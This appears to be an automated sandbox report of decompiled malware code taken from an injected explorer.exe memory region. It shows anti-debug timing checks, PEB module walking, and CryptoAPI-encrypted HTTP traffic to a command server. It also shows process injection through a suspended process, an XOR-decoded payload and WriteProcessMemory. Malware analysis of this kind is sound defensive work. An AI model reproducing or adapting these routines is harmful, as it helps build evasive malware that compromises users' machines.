ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776DB0, Relevance: 4.5, APIs: 3, Instructions: 33
sleep

C-Code - Quality: 72%

			E00776DB0(void* __ecx, void* __fp0) {
				signed char _v4;
				intOrPtr _v8;
				signed int _t9;
				void* _t19;
				signed int _t27;

				_t19 = __ecx;
				asm("sbb dl, [edi+0x421cd09]");
				_t9 = 0x0000001c |  *0x1c;
				_t27 = _t9;
				if(_t27 >= 0) {
					L4:
					_t9 = 0x77;
				} else {
					if(_t27 > 0) {
						asm("fisttp word [edx+0x8f9cbcc]");
						GetTickCount();
						goto L4;
					}
				}
				 *((intOrPtr*)(_t19 - 0xb9707bb)) =  *((intOrPtr*)(_t19 - 0xb9707bb)) + _t19;
				 *_t9 =  *_t9 + _t9;
				asm("adc eax, 0x77b4c4");
				_t11 = GetTickCount() - _v8;
				asm("sbb eax, eax");
				_v4 =  ~((GetTickCount() - _v8 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
				return _v4;
			}

0x00776db0
0x00776db4
0x00776dba
0x00776dba
0x00776dbc
0x00776dd1
0x00776dd1
0x00776dbe
0x00776dbe
0x00776dc0
0x00776dce
0x00000000
0x00776dce
0x00776dbe
0x00776dd3
0x00776dd9
0x00776ddd
0x00776de8
0x00776df7
0x00776df9
0x00776e02

APIs

GetTickCount.KERNEL32 ref: 00776DCE
Sleep.KERNEL32(000001F4), ref: 00776DDC
GetTickCount.KERNEL32 ref: 00776DE2

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776DC8, Relevance: 4.5, APIs: 3, Instructions: 20
sleep

C-Code - Quality: 72%

			E00776DC8(void* __ebx, void* __ecx) {
				signed char _v8;
				intOrPtr _v12;
				void* _t18;

				_t18 = __ecx;
				GetTickCount();
				 *((intOrPtr*)(_t18 - 0xb9707bb)) =  *((intOrPtr*)(_t18 - 0xb9707bb)) + _t18;
				 *0x77 =  *0x77 + 0x77;
				asm("adc eax, 0x77b4c4");
				_t11 = GetTickCount() - _v12;
				asm("sbb eax, eax");
				_v8 =  ~((GetTickCount() - _v12 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
				return _v8;
			}

0x00776dc8
0x00776dce
0x00776dd3
0x00776dd9
0x00776ddd
0x00776de8
0x00776df7
0x00776df9
0x00776e02

APIs

GetTickCount.KERNEL32 ref: 00776DCE
Sleep.KERNEL32(000001F4), ref: 00776DDC
GetTickCount.KERNEL32 ref: 00776DE2

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00775D20, Relevance: 4.2, Strings: 3, Instructions: 433
Crypto

C-Code - Quality: 98%

			E00775D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v168;
				char _v184;
				char _v200;
				char _v204;
				char _v269;
				char _v285;
				char _v301;
				char _v317;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				char _v336;
				char _v849;
				intOrPtr _t239;
				signed int _t250;
				char _t255;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t259;
				signed int _t330;
				intOrPtr _t436;
				intOrPtr _t438;
				void* _t470;

				_v8 = 0;
				if(_a16 == 0) {
					L40:
					return _v8;
				}
				_v64 = 0;
				if(_a20 == 0) {
					__eflags = 0;
					_v28 = 0;
					L9:
					_v60 = E00771110(_a16, E0077633C);
					_t474 = _v60;
					if(_v60 == 0) {
						goto L40;
					}
					_v32 = _v60 - _a16;
					E007712B8( &_v269, _v32, _a16);
					 *((char*)(_t470 + _v32 - 0x109)) = 0;
					E00771308( &_v849, _v60);
					E007754B8( &_v849, _v60, _t474);
					E00775858( &_v301, 0x10);
					E00775858( &_v317, 0x10);
					E007712B8( &_v184, 0x10,  &_v301);
					E007712B8( &_v200, 0x10,  &_v317);
					_v204 = _a28;
					if(_a12 != 0) {
						E007712B8( &_v168, 0x51, _a12);
					}
					E007717E8( &_v48, 0, 0, 0xf0000000, 1);
					E007718A0(_v48, 0x94, _a8,  &_v56, 0, 0);
					_v32 = 0x75;
					E00771AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
					E00771AF8(_v56);
					E00771B20(_v48, 0);
					E00771268( &_v204, 0x80);
					_t239 =  *0x77a1c0; // 0x771f00
					_v12 = E00773864(_t239, _v28, _v64, 0, 0);
					_v28 = 1;
					E0077170C(_v12,  &_v28, 0x46, 4);
					_v28 = 0x1770;
					E0077170C(_v12,  &_v28, 2, 4);
					_v28 = 0x1f40;
					E0077170C(_v12,  &_v28, 6, 4);
					E0077170C(_v12,  &_v28, 5, 4);
					_v28 = 1;
					_t250 = E0077170C(_v12,  &_v28, 0x4d, 4);
					asm("sbb eax, eax");
					if( ~( ~_t250) == 0) {
						_v76 = 1;
						_v72 = 0;
						E0077170C(0,  &_v76, 0x32, 8);
					}
					if(_a4 == 0) {
						_v28 = 0x50;
					} else {
						_v28 = 0x1bb;
					}
					_v16 = E0077161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
					if(_a4 == 0) {
						_v28 = 0x4600000;
					} else {
						_v28 = 0x4e03000;
					}
					_t255 =  *0x77a1c4; // 0x771f48
					_v336 = _t255;
					_t256 =  *0x77a1c8; // 0x771f54
					_v332 = _t256;
					_t257 =  *0x77a1cc; // 0x771f6c
					_v328 = _t257;
					_v324 = 0;
					_t259 =  *0x77a23c; // 0x77209c
					_t436 =  *0x77a1ac; // 0x771ed4
					_v20 = E00771660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
					if(_a4 != 0) {
						_v32 = 4;
						E007716D8(_v20,  &_v28, 0x1f,  &_v32);
						_v28 = _v28 | 0x00000100;
						E0077170C(_v20,  &_v28, 0x1f, 4);
					}
					_t482 = _a24;
					if(_a24 == 0) {
						_v68 = E007713DC(_v32 + 0x80);
						_t397 = 0x80;
						E007712B8(_v68, 0x80,  &_v204);
						__eflags = 0;
						_v32 = 0;
					} else {
						E00775894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
						_v68 = E007713DC(_v32 + 0x80);
						E007712B8(_v68, 0x80,  &_v204);
						_t397 =  &_v301;
						E00775894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
					}
					_t438 =  *0x77a1d0; // 0x771f70
					if(E007715E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
						E00771440(_v68);
						_v32 = 4;
						_v24 = 0;
						_v28 = 0;
						E007739CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
						__eflags = _v24 - 0x12e;
						if(_v24 != 0x12e) {
							goto L39;
						}
						_v40 = E007713DC(0x1000);
						__eflags = 0;
						_v36 = 0;
						while(1) {
							_v44 = E007716A4(_v20, 0,  &_v32, 0);
							asm("sbb eax, eax");
							__eflags =  ~( ~_v44);
							if( ~( ~_v44) == 0) {
								goto L39;
							}
							__eflags = _v44;
							if(_v44 == 0) {
								continue;
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _v36 - 0x20;
								if(_v36 >= 0x20) {
									 *_a32 = E007713DC(_v36 + 1);
									 *_a36 = _v36;
									E007759BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
									E007717E8( &_v48, 0, 0, 0xf0000000, 1);
									E00771374(_v48, 0, 0x8003,  &_v52, 0);
									E00771404(_v52, 0x10,  &_v301, 0);
									E00771404(_v52, 0x10,  &_v317, 0);
									E00771404(_v52, E007712DC( &_v269),  &_v269, 0);
									E00771404(_v52,  *_a36,  *_a32, 0);
									_v32 = 0x10;
									E00771490(_v52,  &_v285, 2, 0,  &_v32);
									E007714D0(_v52);
									E00771B20(_v48, 0);
									_t330 = E007711F8( &_v285, 0x10, _v40);
									__eflags = _t330;
									if(_t330 != 0) {
										E00771440(_v40);
										 *((char*)( *_a32 +  *_a36)) = 0;
										_v8 = 0xffffffff;
									} else {
										E00771440(_v40);
										E00771440( *_a32);
										 *_a32 = 0;
										 *_a36 = 0;
									}
								} else {
									E00771440(_v40);
								}
								goto L39;
							}
							__eflags = _v36 + _v32 - 0x200000;
							if(_v36 + _v32 > 0x200000) {
								goto L39;
							}
							_v40 = E00771460(_v40, _v36 + _v32);
							E007715B0(_v20, _v32, _v40 + _v36,  &_v32);
							_v36 = _v36 + _v32;
						}
						goto L39;
					} else {
						E00771440(_v68);
						L39:
						E0077151C(_v20);
						E0077151C(_v16);
						E0077151C(_v12);
						goto L40;
					}
				}
				if( *_a20 != 1) {
					__eflags =  *_a20 - 2;
					if( *_a20 != 2) {
						__eflags =  *_a20 - 3;
						if( *_a20 != 3) {
							goto L40;
						}
						_v28 = 3;
						_v64 = _a20 + 4;
						goto L9;
					}
					_v28 = 0;
				} else {
					_v28 = 1;
				}
			}

0x00775d2b
0x00775d32
0x00776332
0x00776338
0x00776338
0x00775d3a
0x00775d41
0x00775d81
0x00775d83
0x00775d86
0x00775d93
0x00775d96
0x00775d9a
0x00000000
0x00000000
0x00775da6
0x00775db5
0x00775dbd
0x00775dce
0x00775dd9
0x00775de9
0x00775df9
0x00775e0f
0x00775e25
0x00775e2d
0x00775e37
0x00775e47
0x00775e47
0x00775e5a
0x00775e72
0x00775e77
0x00775e98
0x00775ea0
0x00775eaa
0x00775eba
0x00775ecb
0x00775ed6
0x00775ed9
0x00775eed
0x00775ef2
0x00775f06
0x00775f0b
0x00775f1f
0x00775f31
0x00775f36
0x00775f4a
0x00775f51
0x00775f57
0x00775f59
0x00775f62
0x00775f71
0x00775f71
0x00775f7a
0x00775f85
0x00775f7c
0x00775f7c
0x00775f7c
0x00775fa8
0x00775faf
0x00775fba
0x00775fb1
0x00775fb1
0x00775fb1
0x00775fc1
0x00775fc6
0x00775fcc
0x00775fd1
0x00775fd7
0x00775fdc
0x00775fe4
0x00775fea
0x00776005
0x00776013
0x0077601a
0x0077601c
0x00776032
0x00776037
0x0077604b
0x0077604b
0x00776050
0x00776054
0x007760bd
0x007760c6
0x007760ce
0x007760d3
0x007760d5
0x00776056
0x00776068
0x0077607a
0x0077608b
0x0077609d
0x007760a9
0x007760a9
0x007760e8
0x007760f8
0x0077610a
0x0077610f
0x00776118
0x0077611d
0x00776133
0x00776138
0x0077613f
0x00000000
0x00000000
0x0077614f
0x00776152
0x00776154
0x00776157
0x00776166
0x0077616e
0x00776172
0x00776174
0x00000000
0x00000000
0x0077617a
0x0077617e
0x00000000
0x00000000
0x00776180
0x00776184
0x007761c5
0x007761c9
0x007761e4
0x007761ec
0x0077620a
0x0077621d
0x00776232
0x00776247
0x0077625c
0x00776279
0x0077628d
0x00776292
0x007762ad
0x007762b5
0x007762bf
0x007762d2
0x007762d7
0x007762d9
0x00776300
0x0077630f
0x00776313
0x007762db
0x007762de
0x007762e8
0x007762f2
0x007762f9
0x007762f9
0x007761cb
0x007761ce
0x007761ce
0x00000000
0x007761c9
0x0077618c
0x00776191
0x00000000
0x00000000
0x007761a5
0x007761b8
0x007761c0
0x007761c0
0x00000000
0x007760fa
0x007760fd
0x0077631a
0x0077631d
0x00776325
0x0077632d
0x00000000
0x0077632d
0x007760f8
0x00775d49
0x00775d57
0x00775d5a
0x00775d66
0x00775d69
0x00000000
0x00000000
0x00775d6f
0x00775d7c
0x00000000
0x00775d7c
0x00775d5e
0x00775d4b
0x00775d4b
0x00775d4b

Strings

u, xrefs: 00775E77
P, xrefs: 00775F85
, xrefs: 007761C5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774E94, Relevance: 3.0, APIs: 2, Instructions: 37
native

C-Code - Quality: 100%

			E00774E94(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				void* _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
				if(_v16 == 0 && _v48 != 0) {
					_v24 = _v48 + 8;
					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20);
					_v12 = _v28;
				}
				return _v12;
			}

0x00774e9a
0x00774eb3
0x00774eba
0x00774ec8
0x00774edd
0x00774ee6
0x00774ee6
0x00774eef

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00774EAD
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774EDD

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00773988, Relevance: 3.0, APIs: 2, Instructions: 24

C-Code - Quality: 84%

			E00773988(CHAR* __eax) {
				CHAR* _v8;
				signed char _v12;
				void* _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t16;

				_v8 = __eax;
				_v12 = 0;
				_t16 = FindFirstFileA(_v8,  &_v336);
				_v16 = _t16;
				asm("sbb eax, eax");
				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
				FindClose(_v16);
				return _v12;
			}

0x00773991
0x00773996
0x007739a4
0x007739aa
0x007739b6
0x007739b8
0x007739bf
0x007739cb

APIs

FindFirstFileA.KERNEL32(?,?), ref: 007739A4
FindClose.KERNEL32(000000FF), ref: 007739BF

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771AAE, Relevance: 1.5, APIs: 1, Instructions: 30encryption

APIs

CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00771AE5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771AB0, Relevance: 1.5, APIs: 1, Instructions: 29encryption

APIs

CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00771AE5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007717A2, Relevance: 1.5, APIs: 1, Instructions: 28
encryption

C-Code - Quality: 100%

			E007717A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x007717aa
0x007717ad
0x007717b0
0x007717bb
0x007717db
0x007717db
0x007717e4

APIs

CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007717D5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007718A0, Relevance: 1.5, APIs: 1, Instructions: 27
encryption

C-Code - Quality: 100%

			E007718A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
				long* _v8;
				BYTE* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b500)) != 0xe9) {
					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x007718a6
0x007718a9
0x007718ac
0x007718b7
0x007718d7
0x007718d7
0x007718e0

APIs

CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 007718D1

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007717A4, Relevance: 1.5, APIs: 1, Instructions: 27
encryption

C-Code - Quality: 100%

			E007717A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x007717aa
0x007717ad
0x007717b0
0x007717bb
0x007717db
0x007717db
0x007717e4

APIs

CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007717D5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007717E8, Relevance: 1.5, APIs: 1, Instructions: 25
encryption

C-Code - Quality: 100%

			E007717E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
				HCRYPTPROV* _v8;
				char* _v12;
				char* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b4fc)) != 0xe9) {
					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
				}
				return _v20;
			}

0x007717ee
0x007717f1
0x007717f4
0x007717ff
0x0077181b
0x0077181b
0x00771824

APIs

CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00771815

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771490, Relevance: 1.5, APIs: 1, Instructions: 25encryption

APIs

CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 007714BD

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771374, Relevance: 1.5, APIs: 1, Instructions: 25encryption

APIs

CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 007713A1

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771402, Relevance: 1.5, APIs: 1, Instructions: 24encryption

APIs

CryptHashData.ADVAPI32(?,?,?,?), ref: 0077142D

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771404, Relevance: 1.5, APIs: 1, Instructions: 23encryption

APIs

CryptHashData.ADVAPI32(?,?,?,?), ref: 0077142D

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771574, Relevance: 1.5, APIs: 1, Instructions: 23encryption

APIs

CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0077159D

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 0077153C, Relevance: 1.5, APIs: 1, Instructions: 21
encryption

C-Code - Quality: 100%

			E0077153C(long* __eax, BYTE* __ecx, int __edx) {
				long* _v8;
				int _v12;
				BYTE* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b458)) != 0xe9) {
					_v20 = CryptGenRandom(_v8, _v12, _v16);
				}
				return _v20;
			}

0x00771542
0x00771545
0x00771548
0x00771553
0x00771567
0x00771567
0x00771570

APIs

CryptGenRandom.ADVAPI32(?,?,?), ref: 00771561

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007715B0, Relevance: 1.5, APIs: 1, Instructions: 20
filenetwork

C-Code - Quality: 100%

			E007715B0(void* __eax, long __ecx, void* __edx, DWORD* _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = InternetReadFile(_v8, _v12, _v16, _a4);
				return _v20;
			}

0x007715b6
0x007715b9
0x007715bc
0x007715d5
0x007715de

APIs

InternetReadFile.WININET(?,?,?,?), ref: 007715CF

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771B20, Relevance: 1.5, APIs: 1, Instructions: 18
encryption

C-Code - Quality: 100%

			E00771B20(long* __eax, int __edx) {
				long* _v8;
				int _v12;
				int _v16;

				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x77b50c)) != 0xe9) {
					_v16 = CryptReleaseContext(_v8, _v12);
				}
				return _v16;
			}

0x00771b26
0x00771b29
0x00771b34
0x00771b44
0x00771b44
0x00771b4d

APIs

CryptReleaseContext.ADVAPI32(?,?), ref: 00771B3E

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007714D0, Relevance: 1.5, APIs: 1, Instructions: 16encryption

APIs

CryptDestroyHash.ADVAPI32(?), ref: 007714E7

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00771AF8, Relevance: 1.5, APIs: 1, Instructions: 16
encryption

C-Code - Quality: 100%

			E00771AF8(long* __eax) {
				long* _v8;
				int _v12;

				_v8 = __eax;
				if( *((char*)( *0x77b508)) != 0xe9) {
					_v12 = CryptDestroyKey(_v8);
				}
				return _v12;
			}

0x00771afe
0x00771b09
0x00771b15
0x00771b15
0x00771b1e

APIs

CryptDestroyKey.ADVAPI32(?), ref: 00771B0F

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776B18, Relevance: .0, Instructions: 32

C-Code - Quality: 65%

			E00776B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;

				_v24 = __eax;
				asm("rdtsc");
				_v12 = __eax;
				_v8 = __edx;
				asm("cpuid");
				asm("rdtsc");
				_v20 = 0;
				_v16 = __edx;
				 *((intOrPtr*)(_v24 + 4)) = _v16;
				 *_v24 = _v20;
				return E00776A38(_v24,  &_v12);
			}

0x00776b1e
0x00776b25
0x00776b27
0x00776b2a
0x00776b2f
0x00776b31
0x00776b33
0x00776b36
0x00776b43
0x00776b4c
0x00776b5c

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007724F8, Relevance: .0, Instructions: 22

C-Code - Quality: 100%

			E007724F8() {
				intOrPtr _v8;
				intOrPtr* _t10;

				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				do {
					_t10 =  *_t10;
				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
				_v8 =  *((intOrPtr*)(_t10 + 8));
				return _v8;
			}

0x00772509
0x0077250c
0x0077250c
0x00772511
0x0077251d
0x00772528

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00779178, Relevance: .0, Instructions: 22

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00779147, Relevance: .0, Instructions: 21

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00775028, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 215
threadprocessfile

C-Code - Quality: 98%

			E00775028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t144;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E007712DC(_a16) + 1;
				}
				E00771258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L22:
					return _v8;
				}
				E00771164(E007710B4(_t109, 0x44),  &_v353);
				E0077133C( &_v353, "_section");
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
				_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
				_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
				E007712B8(_v16, _v24, _a8);
				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
				E007712B8(_v16 + _v24 + 8, _a20, _a16);
				_v24 = 0x29b;
				E007713B4( &_v28, _v24 + 0x11);
				E007712B8(_v28, _v24, 0x77a2ac);
				_t144 = _v24 - 1;
				if(_t144 < 0) {
					L9:
					_v20 = E007712DC( &_v353) + 1;
					E007712B8(_v28 + _v24, _v20,  &_v353);
					_v24 = _v24 + _v20;
					_v40 = 0;
					_v40 = E00774EF0(_v332.ExtendedRegisters.hProcess, _t224);
					if(_v40 == 0) {
						E00771258( &_v332, 0xcc);
						_v332.ContextFlags = 0x10007;
						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
							_v40 = _v332.Eax;
						}
					}
					_t228 = _v40;
					if(_v40 == 0) {
						_v40 = E00774DE0(_v332.ExtendedRegisters.hProcess, _t228);
					}
					if(_v40 != 0) {
						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
						E00771828(_v28);
						ResumeThread(_v124);
						if(_a24 == 0) {
							__eflags = 0;
							_v8 = 0;
						} else {
							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
								_v8 = 0xfffffffe;
							} else {
								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
							}
						}
						CloseHandle(_v124);
						CloseHandle(_v332.ExtendedRegisters);
					}
					goto L22;
				}
				_v44 = _t144 + 1;
				_v32 = 0;
				do {
					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
					_v32 = _v32 + 1;
					_t55 =  &_v44;
					 *_t55 = _v44 - 1;
					_t224 =  *_t55;
				} while ( *_t55 != 0);
				goto L9;
			}

0x00775031
0x0077503c
0x00775046
0x00775046
0x0077504d
0x0077505e
0x0077505e
0x00775069
0x0077506e
0x0077508f
0x00775097
0x00775099
0x0077509d
0x007752ce
0x007752d4
0x007752d4
0x007750ae
0x007750bf
0x007750d9
0x007750fb
0x00775113
0x0077511f
0x00775130
0x0077513e
0x0077514f
0x00775154
0x00775164
0x00775174
0x0077517c
0x0077517f
0x007751a5
0x007751b1
0x007751c3
0x007751cb
0x007751d0
0x007751db
0x007751e2
0x007751ef
0x007751f4
0x00775211
0x00775222
